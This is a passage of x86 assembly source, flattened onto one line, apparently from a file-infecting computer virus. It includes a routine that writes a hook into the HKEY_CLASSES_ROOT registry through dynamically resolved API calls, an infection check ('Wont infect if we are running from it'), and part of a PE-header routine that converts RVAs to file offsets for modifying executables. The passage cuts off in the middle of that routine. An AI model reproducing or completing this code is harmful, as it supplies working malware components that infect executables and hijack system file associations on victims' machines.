(Wont infect if we are running from it) + mov byte ptr [ebp + _MainHostFile], 0 + pop edi + + assume ebx : nothing + + + + lea eax, dword ptr [ebp + Disp] + push eax + lea eax, dword ptr [ebp + pKey] + push eax + xor eax, eax + push eax + push KEY_ALL_ACCESS + push REG_OPTION_NON_VOLATILE + push eax + push eax + lea eax, dword ptr [ebp + szKeyName] + push eax + push HKEY_CLASSES_ROOT + lea eax, dword ptr [ebp + szRegCreateKeyExA] + Call ADVAPI32Api + + lea esi, dword ptr [ebp + szRegHook] + mov eax, edi + call _strlen + push edi + add edi, eax + mov ecx, eax + @@: + lodsb + stosb + inc ecx + or al,al + jnz @B + pop edi + + + push ecx ; <- size of hookstring + push edi ; hookstring + push REG_SZ + xor eax, eax + push eax + push eax + push dword ptr [ebp + pKey] + lea eax, dword ptr [ebp + szRegSetValueExA] + Call ADVAPI32Api + + push dword ptr [ebp + pKey] + lea eax, dword ptr [ebp + szRegCloseKey] + Call ADVAPI32Api + + + add esp, 800h + ret + + +SetupRegHook endp + + + + + + + + + + + +; +; +;in: esi = pFileMap +;in: edi = RVA +; +;out: eax = File offset +; + + RVAToOffset PROC uses edi esi ecx + + assume esi:ptr IMAGE_DOS_HEADER + add esi,[esi].e_lfanew + assume esi:ptr IMAGE_NT_HEADERS + + mov edx,esi + add edx,sizeof IMAGE_NT_HEADERS + + movzx ecx,[esi].FileHeader.NumberOfSections + assume edx:ptr IMAGE_SECTION_HEADER + .while ecx>0 ; check all sections + .if edi>=[edx].VirtualAddress + mov eax,[edx].VirtualAddress + add eax,[edx].SizeOfRawData + .if edi